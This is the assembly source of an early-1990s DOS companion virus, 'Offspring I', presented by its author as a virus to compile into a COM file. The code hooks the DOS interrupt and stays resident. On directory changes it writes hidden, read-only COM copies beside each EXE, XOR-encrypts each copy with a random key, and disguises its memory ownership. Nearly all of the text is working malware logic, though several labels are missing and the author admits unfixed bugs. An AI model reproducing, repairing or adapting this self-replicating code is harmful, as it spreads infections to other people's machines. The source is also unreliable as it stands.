; OSPRING.COM - Make sure you compile this to a COM file
; - Compatible with A86 v3.22
; OFFSPRING I - By VG Enterprises (Virogen)
; NOTICE : Don't hold me responsible for any damages, or the release
; of this virus. Use this at your own risk. NOT intended
; for any lamers to upload the Mcafee! Thank you for your
; loyal obendience.
; - Mutation engine much smaller
; - Now change interrupt vectors directly
; - The XOR number is now generated randomly
; using the system clock as a base.
; - The FF/FN buffer has been moved outside
; of the virus code, so disk space is
; lowered.
; INFECTION METHOD : Everytime DOS changes directories, or changes
; drives... all files in the CURRENT directory
; (the one you're coming out of) will be infected.
; COM files will be hidden, and have the read-only
; attribute. When they are executed they will
; check if the virus is already in memory, and
; then execute the corresponding EXE file. See
; This virus is NOT completed, so don't go off when you find a
; bug. There is one that I haven't determined the cause of yet,
; Do a 'DIR' of a directory other than the current, and see
; what happens. There's still some variables that can be
; moved outside of the code, but it won't make a hell of
; a difference in size.
title off_spring_1
cseg segment
assume cs: cseg, ss: cseg, es: cseg
signal equ 7dh ; Installation check
reply equ 0FCh ; Yep, we're here
cr equ 0dh ; carraige return
lf equ 0ah ; line feed
f_name equ 1eh ; Offset of file name in FF/FN buffer
f_sizel equ 1ch ; File size - low
org 100h ; Leave room for PSP
; jump to the beginning of the main procedure
jmp no_dec ; Skip decryption, changes to NOP
lea di,enc_data+2 ; Point to byte after encryption num
mov dx,[di-2] ; load encryption num
call encrypt ; Decrypt the virus
jmp main ; Jump to main routine
enc_data DW 0000 ; Encryption Data - num we XOR by
ID DB cr,lf,'(c)1993 VG Enterprises',cr,lf ; my copyright
VNAME Db cr,lf,'* Congratulations, You have recieved the privelge of being infected by the *'
Db cr,lf,'* Offspring I v0.05. *','$'
fname db '*.EXE',0 ; Filespec to search for
sl db '\' ; Backslash for directory name
file_dir db 64 dup(0) ; directory of file we infected
file_name db 13 dup(0) ; filename of file we infected
old_dta dd 0 ; old seg:off of DTA
old21_ofs dw 0 ; Offset of old INT 21H
old21_seg dw 0 ; Seg of old INT 21h
par_blk dw 0 ; command line count byte -psp
par_cmd dw 0080h ; Point to the command line -psp
par_seg dw 0 ; seg
dw 05ch ; Use default FCB's in psp to save space
par1 dw 0 ;
dw 06ch ; FCB #2
par2 dw 0 ;
; This is our new INT 21H (dos) interrupt handler!
new21 proc ; New INT 21H handler
cmp ah, signal ; signaling us?
jne no
mov ah,reply ; yep, give our offspring what he wants
jmp end_21
cmp ah, 3bh ;
je run_res ; Nope, jump
cmp ah,0eh
jne end_21
push ax
push bx
push cx
push dx
push di
push si
push bp
push ds
push es
push sp
push ss
push cs
pop ds
mov ah,2fh
int 21h ; Get the DTA
mov ax,es
mov word ptr cs: old_dta,bx
mov word ptr cs: old_dta+2,ax
push cs
pop es
call resident
mov dx,word ptr cs: old_dta
mov ax,word ptr cs: old_dta+2
mov ds,ax
mov ah,1ah
int 21h ; Restore the DTA
pop ss
pop sp
pop es
pop ds
pop bp
pop si
pop di
pop dx
pop cx
pop bx
pop ax
end_21 :
jmp [ dword ptr cs: old21_ofs] ; jump to original int 21h
new21 endp ; End of handler
; ------------------------------------------------------------
; Main procedure
; -----------------------------------------------------------
main proc
mov word ptr [0100h],9090h ; NOP the jump past decryption
mov byte ptr [0102h],90h
mov bx,(offset vend+50) ; Calculate memory needed
mov cl,4 ; divide by 16
shr bx,cl
inc bx
mov ah,4ah
int 21h ; Release un-needed memory
mov ax,ds: 002ch ; Get environment address
mov par_blk,ax ; Save in parameter block for exec
mov par1,cs ; Save segments for EXEC
mov par2,cs
mov par_seg,cs
mov ah,2ah ; Get date
int 21h
cmp dl,14 ; 14th?
jne no_display
mov ah,09 ; Display message
lea dx,ID
int 21h
call install ; check if installed, if not install
mov dx,offset file_dir -1 ; Execute the original EXE
mov bx,offset par_blk ; For some damned reason
mov ax,4b00h ; control is not returned back
int 21h ; to the virus.
push cs
pop ds
mov es,ds
mov ah,4ch ; Exit
int 21h
main endp
; INSTALL - Install the virus
Install Proc
mov ah,signal
int 21h
cmp ah,reply
je no_install
xor ax,ax
mov es,ax
mov ax,es: [21h*4+2]
mov bx,es: [21h*4]
mov ds: old21_seg,ax ; Store segment
mov ds: old21_ofs,bx ; Store offset
mov es: [21h*4+2],cs ; Save seg
mov es: [21h*4],offset new21 ; off
push cs
pop ds
mov es,ds
mov dx,(offset vend+50)
add dx,dx
; Calculate memory needed
mov cl,4 ; \ Divide by 16
shr dx,cl ; /
add dx,1 ;
mov ax,3100h ;
int 21H ; Terminate Stay Resident
Install Endp
; Resident - This is called from the INT 21h handler
resident proc
mov ax,ds ; Calculate segment of MCB
dec ax ;
mov ds,ax ;
mov ds: [0001],word 0008h ; Mark DOS as the owner- so some
; utilities won't id the file the virus
; loaded from.
push cs
pop ds
mov word ptr vend,0 ; Clear ff/fn buffer
lea si, vend ;
lea di, vend+2 ;
mov cx,22 ;
cld ;
rep movsw ;
; Set DTA address - This is for the Findfirst/Findnext INT 21H functions
mov ah, 1ah
lea dx, vend
int 21h
; Find first .EXE file
mov ah, 4eh
mov cx, 0 ; Set normal file attribute search
lea dx, fname
int 21h
jnc next_loop
jmp end_prog
next_loop :
mov file_dir,0
lea si,file_dir
lea di,file_dir+1
mov cx,77
rep movsb
mov ah,47h
xor dl,dl
lea si,file_dir
int 21h
cmp word ptr vend[f_sizel],0
jne find_file
xor bx,bx
lm3 :
inc bx
cmp file_dir[bx],0
jne lm3
mov file_dir[bx],'\'
inc bx
mov cx,13
lea si,vend[f_name]
lea di,file_dir[bx]
rep movsb
xor bx,bx
mov bx,1eh
inc bx
cmp byte ptr vend[bx], '.'
jne loop_me
inc bx
mov word ptr vend [bx],'OC'
mov byte ptr vend [bx+2],'M'
call write_file ; Write virus to file
; Find next file
find_file :
mov ah,4fh
int 21h
jnc next_loop
exit :
resident endp
; Write file procedure - Creates the file, writes the file, closes the file
write_file proc
lea dx, vend[f_name]
mov ah, 3ch ; Create file
mov cx, 02h ; READ-ONLY
or cx, 01h ; Hidden
int 21h ; Call INT 21H
jc no_infect ; If Error-probably already infected
mov bx,ax
push dx
call copy_mem ; copy virus just outside of code
mov ah,2ch ;
int 21h ; Get random number from clock
lea di,vend+enc_data-204 ; offset of new copy of virus
mov [di-2],dx ; save encryption #
push bx
call encrypt ; writing it to a file
pop bx
mov cx, offset vend-100h ; # of bytes to write
lea dx, vend+50 ; Offset of buffer
mov ah, 40h ; -- our program in memory
int 21h ; Call INT 21H function 40h
pop dx
mov ah, 3eh
int 21h
ret ; Return
write_file endp
; Copies virus outside of code, to encrypt
copy_mem proc
mov si,0100h ; si=0
lea di,vend+50 ; destination
mov cx,offset vend-100h ; bytes to move
rep movsb
copy_mem endp
end_encrypt dw 0000h ; Let's encrypt everything up to here
; Encrypt
; Call with
; di=offset of encrypted/decrypted data
; dx=XOR value
; - First word to encrypt must be a free word.
; This word will be used as the encryption base. Every time the virus
; is encrypted a random number will be saved here.
encrypt proc
mov cx,(offset end_encrypt - offset enc_data)/2
xor [di],dx ; Xor each word by dx
inc di
inc di ; increment index
loop E2 ; loop while cx != 0
encrypt endp
vend dw 0
cseg ends
end start